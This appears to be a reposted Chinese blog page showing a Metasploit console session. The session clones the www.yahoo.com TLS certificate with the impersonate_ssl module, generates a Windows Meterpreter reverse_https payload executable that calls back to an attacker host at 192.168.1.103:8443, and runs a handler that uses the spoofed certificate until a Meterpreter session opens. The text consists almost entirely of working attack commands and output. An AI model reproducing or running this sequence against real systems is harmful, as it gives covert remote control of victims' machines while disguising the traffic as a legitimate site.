您的位置:首页 > 理论基础 > 计算机网络

Metasploit - reverse_https

2015-11-17 10:39 856 查看 
msf auxiliary(impersonate_ssl) > show options

Module options (auxiliary/gather/impersonate_ssl):

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
ADD_CN                             no        Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT                            no        CA Public certificate
EXPIRATION                         no        Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT        PEM              yes       Output format (Accepted: DER, PEM)
PRIVKEY                            no        Sign the cert with your own CA private key
PRIVKEY_PASSWORD                   no        Password for private key specified in PRIV_KEY (if applicable)
RHOST                              yes       The target address
RPORT             443              yes       The target port

msf auxiliary(impersonate_ssl) > set RHOST www.yahoo.com
RHOST => www.yahoo.com
msf auxiliary(impersonate_ssl) > run

[*] Connecting to www.yahoo.com:443
[*] Copying certificate from www.yahoo.com:443
/C=US/ST=California/L=Sunnyvale/O=Yahoo Inc./OU=Information Technology/CN=www.yahoo.com
[*] Beginning export of certificate files
[*] Creating looted key/crt/pem files for www.yahoo.com:443
[+] key: /home/notfound/.msf4/loot/20151117022203_default_116.214.12.74_www.yahoo.com_ke_612544.key
[+] crt: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_ce_987985.crt
[+] pem: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
[*] Auxiliary module execution completed


msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf payload(reverse_https) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf payload(reverse_https) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf payload(reverse_https) > set LPORT 8443
LPORT => 8443
msf payload(reverse_https) > generate -t exe -f /tmp/https.exe -p x86
[*] Writing 73802 bytes to /tmp/https.exe...


msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) >
[*] 192.168.1.106:1432 (UUID: 0d7dc065ab206136/x86=1/windows=1/2015-11-17T02:28:16Z) Staging Native payload ...
[*] Meterpreter will verify SSL Certificate with SHA1 hash 9ce474cb2ec1122d77e05dc20f89a9c03266dd81
[*] Meterpreter session 1 opened (192.168.1.103:8443 -> 192.168.1.106:1432) at 2015-11-17 02:28:20 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


References

http://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航